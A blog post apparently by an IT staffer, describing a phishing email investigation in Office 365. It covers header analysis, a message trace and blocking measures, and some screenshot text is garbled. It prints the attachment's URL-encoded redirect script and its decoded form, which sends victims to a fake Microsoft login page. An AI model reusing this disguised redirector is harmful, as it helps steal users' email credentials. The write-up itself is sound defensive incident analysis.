To Be A CyberMan: The spam email investigation 1

 To Be A CyberMan: The spam email investigation 1

1. Detection
The HelpDesk Team reported a spam email case. The spam email subject is "Audio-Message Received 6 July.2020". The email pretends a Vmail from Office365 with an HTM attachment named as a phone number.
The Phishing Email comes from the email address: graham@ghtec.co.uk. More than 20 employees got this email. If we download the attached file and open it, it will locate to a phishing website.

     


2. Analysis and Traced

From the attached HTM file, I can see the source code is:


<ads><script language="javascript">document.write(unescape('%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%72%65%66%72%65%73%68%22%20%63%6f%6e%74%65%6e%74%3d%22%31%3b%75%72%6c%3d%68%74%74%70%73%3a%2f%2f%62%65%6e%6e%79%72%61%74%69%6f%6e%73%65%74%2e%6e%65%74%2f%63%63%2f%49%74%2f%61%58%52%41%62%6d%4e%79%61%53%35%6a%62%32%30%3d%22%3e'));</script></ads>


All of those numbers are hexadecimal values for ASCII characters. I decoded the string using online Coder’s Toolbox(https://coderstoolbox.net/string/#!encoding=xml&action=encode&charset=us_ascii). Set string conversion options to URL and Decode. 

After decoded, the html resource code is:


<script language="javascript">document.write(unescape('<meta http-equiv="refresh" content="1;url=https://bennyrationset.net/cc/It/aXRAbmNyaS5jb20=">

'));</script>


From the resource code, we can tell that this script will re-locate your browser to the phishing website, The phishing website is similar to the Microsoft email login portal. When you type in your email address, The website actually steals your email password.


    


3. Investigation
    3.1 Check Threat Management, check the Quarantine Tab to see if the spam email was quarantined.
    Data loss preve n Records management Information govemance @ Supervision Threat management Dashboard Submissions Review Policy Mail flow Home > Review Quarantine Review quarantined messages and decide whether you want to release them to one or more of the intended recipients. Restricted Users Unblock users who have been blocked for sending too many messages marked as spam/bulk. Malware detected in email 08/12 08/14

    3.2 Check The email Message Header, use Microsoft Message Header Analyzer

    Records management Information govemance @ Supervision Threat management Dashboard Submissions Review Policy Mail flow Data privacy p Search eDiscovery Reports Service assurance The email messages here were quarantined because they were classified as malware, spam, phish, or bulk email or because of a transport rule s of the intended recipients. Learn more about quarantined email messages Sort results by Message D V Enter exact ID address, or subject and then click Refresh. Only one O Filter Modify Columns Received (UTC -04:00) v 8/14/20 10:28 PM 8/14/20 10:28 PM 8/14/20 10:28 PM 8/14/20 10:28 PM 8/14/20 9:31 AM 8/14/20 9:05 AM 8/14/20 9:05 AM 8/13/20 11:10AM 8/13/20 11:10AM 8/13/20 11:10AM Sender Airene.Jovellanos@tnt.com airene.jovellanos@tnt.com Airene.Jovellanos@tnt.com airene.jovellanos@tnt.com 9867@cogeco.ca 9867@cogeco.ca 9867@cogeco.ca Subject wa 45022919053 wa 45022919053 wa 45022919053 wa 45022919053 1:31 PM Friday August 14, 2020 1:05 PM Friday August 14, 2020 1:05 PM Friday August 14, 2020 Re: Re: Site #5656 Quarantine reason High Confidence Phish High Confidence Phish Malware Malware High Confidence Phish High Confidence Phish High Confidence Phish Malware Malware Malware Release message '6 View message header Preview message Remove from quarantine Download message Submit message Message ID <dabaf82b-be35-4b6d-8a86- ef7S4bf3b941 M81787 .CANPRDOI.PRODOUTLOOK.COM> Sender address Airene.Jovellanos@tnt.com Received (UTC -04:00) 8/14/20 10:28 PM Subject wa 45022919053 Quarantine reason High Confidence Phish Recipient count

    Message Header Analyzer libert ttæ msqge header you would like to analyze = ? us-ascii? Q? F I gm2nCCM3qy Yfam P8x 3ghQwHTAC"vm6/JG njrpxdp22m ArV5tdCKipBG8az? = X-MS-Exchange-Transport-CrossTenantHeadersStamped: YTXPROIOIMBI 582 X-EopAttribution-RoutedToQuarantineCount: O X- MS- Excha nge- Transport-C rossTenantHeadersStripped: QBI CANDI FT020.eop-CANOI prod.protection.outlook.com X-Cri inatorO : NCRINC.onmicrosoft.com Analyze heeders Clear Submit feedback on gi_thu Country/Region Language Spam Confidence Level Spam Filtering Verdict IP Filter Verdict HELO/EHLO string PTR Record Connecting IP Address Protection Policy Category Spam rules Source header Unknown fields SPM eugvdvtk.outbound-mail.sendgrid.net wrqvdvtk.outbound-mail.sendgrid.net 149.72.216.113 CIP: 149.72.216.113 Antispam Header Bulk Complaint Level Source header 8CL:o; Other headers Header Authentication -Results Received-SPF DKIM-Signature spf=pass (sender is 14.72.216.113) smtp.mailfrom=sendgrid.ne Value dkim=pass (signature was verified) header.d=sendgrid.ne action—none reason—DOI Pass (protection.outlook.com: domain of sendgrid.net designates 149.72.216.113 as permitted sender) receiver—protection.outlook.com: client-ip= 14972.216.113; helo=wrqvdvtk.outbound-mail.sendgrid.net• v: I: a=rsa-sha256; c=relaxed/relaxed; d=sendgrid.net: s=smtpapi:

    3.3 Run a message trace, locate the message in the results, and then view specific details about the message
    Home > Message trace Run a message trace to track the flow of email messages in your organization. This can help you troubleshoot mail flow issues by determining if messages w Home Start a trace CD Refresh Alerts Permissions — Classification Data loss prevention Records management Information govemance @ Supervision Threat management Mail flow Dashboard Message trace Default queries (5) Custom queries (o) Autosaved queries (10) Downloadable reports (2) Queries provided by Office 365 Queries created and saved by admins in your organization Last 10 queries that were run but not saved manually Downloadable message trace reports (completed and pending)

    Message trace search results Export results Message trace details DBF File have been retrieved Date (UTC-04:OO) Aug IS. 2020 Aug IS. Aug 14. 2020 Aug 14. 2020 Aug 14. 2020 Aug 14. 2020 Aug 14. 2020 Aug 14. 2020 Aug 14. 2020 Aug 14. 2020 Aug 14. 2020 Aug 14. 2020 Aug 14. 2020 Sender Sender: Recipient: Received o Processed Status Delivered The message was delivered to the recipient's mailbox. Because of an Inbox rule the recipient set up, the message was delivered to the following folder: Folder. IT Scrip Task More Information For help With changing your Inbox rules, see Organize email by using Inbox rules in Outlook on the web. Message events More information Message ID: Message size: From IP: To Submit message 15 KB 250 item(s) Vare items a•Ã¦ilsble, scroll down to see more. Close

 Here is the result of the email trace.


origin_timestamp_utc 2 4 6 7 8 10 12 14 16 17 18 19 20 22 23 24 26 sender address graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk graham@ghtec.co.uk message_subject "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July "Audio::Message Received 6 July total byte 21826217.72.192.74 345831212.227.126.135 22785212.227.17.13 35130212.227.17.24 34866 212.227.126.135 217971212.227.126.131 34749212.227.17.10 347451212.227.126.134 34806 212.227.126.133 346711212.227.126.134 353911212.227.126.133 34808 217.72.192.73 35122 217.72.192.74 348611212.227.126.133 34896 212.227.126.133 34969 212.227.126.131 34900 212.227.126.131 35070212.227.17.24 34807 212.227.126.135 35006 212.227.126.130 33387 212.227.126.130 34769 212.227.126.187 34808 212.227.17.10 3464$217.72.192.74 34769 212.227.126.131 directionality Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming Incoming con n ecto , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" , 2020" delivery_priority Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal


4. Protection 

    4.1. Create Exchange connection filter policy, add original IP address into Exchange IP block List

    

    

    4.2 Create Spam filter policy, Add the email address and email domain into spam filter BlackList

    


    4.3 Mark JavaScript or VBScript in HTML as Spam, Mark Frame, or Iframe Tags in HTML as Spam.

    


    4.4 Purchase Office 365 Advanced Threat Protection service(ATP) for some critical accounts.


    4.5 Consider developing the commercial email spam/protection Email Anti-Spam Filtering solutions on Exchange such as Proofpoint Essentials, Mimecast, Barracuda Essentials.





Comments

Post a Comment

Popular posts from this blog

To Be A CyberMan: Installing PfSense on a WatchGuard Firebox

Image
OX01 Preface My company recently upgraded its firewall to FortiGate Firewall.  They eliminated 3 of the licenses expired WatchGuard Firebox Firewalls. The WatchGuard FireBox models are XTM5 Series, M400, and M470. I was wondering if I can install the opensource Firewall application such as PfSense on FireBox to use as Testing Lab Environment. 0X02 Information      XTM5 Series comes with a 1GB CF card, free space is not enough for the lastest Pfsense,  need to add additional Hard Disk as PfSense system booting drive.     M400 comes with a 4 GB CF card, can use CF card as a PfSense system booting drive.     M470 comes with mSTAT SSD.  can SSD as a PfSense system booting drive. 0X03 Installing PfSense on M400 1. Preparation:           WatchGuard Firebox M400 Appliance          A USB Flash Drive          A CF Card USB reader          A co...
Read more

How I passed the CSX Fundamentals within one month

Image
  How I passed the CSX Fundamentals within one month Hi Guys, My name is Trevor Shi. I just passed the CSX within one month. I would like to share some experience maybe it will help you guys to prepare the exam. One of the funny things was, I used one month to learn it. But I spent the other one month to book the exam. I re-booked 5 times of exam as ISACA PSI online exam application has lots of issues.  I met every situation you can imagine. The first-time ISACA website down, the second-time they canceled my booked without excuse, the third-time application couldn't open, and the Fourth time was my fault, I just missed the exam. Finally, I got this certificate. We had a small group named CyberRookie, It just like an unorganized cyber knowledge self-studying group, we are trying to be more organized. So t he purpose of this article is as a guideline of the CyberRookie Project CSX certification learning method . A. The Cybersecurity Fundamentals Certific...
Read more

To Be A CyberMan: The 0365 email/ADFS Troubleshooting - Http status 500 error

Image
 To Be A CyberMan: The O365 email/ADFS Troubleshooting - Http status 500 error    0x00: Preview Knowlege ADFS: Active Directory Federation Services (ADFS) is a Microsoft Single Sign-On (SSO) solution. It provides users with authenticated access to applications that are not capable of using Integrated Windows Authentication (IWA) through Active Directory (AD).   Reference: https://docs.microsoft.com/en-us/windows-server/identity/active-directory-federation-services   0x01: Symptoms Some users reported they were not able to log into the email from Web console, the error shows: HTTP status 500:internal server error   0x02: Troubleshooting We tested some accounts email, The issue only affected some of the user's web-based Outlook applications. So we sent the email to our outlook service provider, got confirmation that the outlook service is working. From the error message, we can see the error is the internal serv...
Read more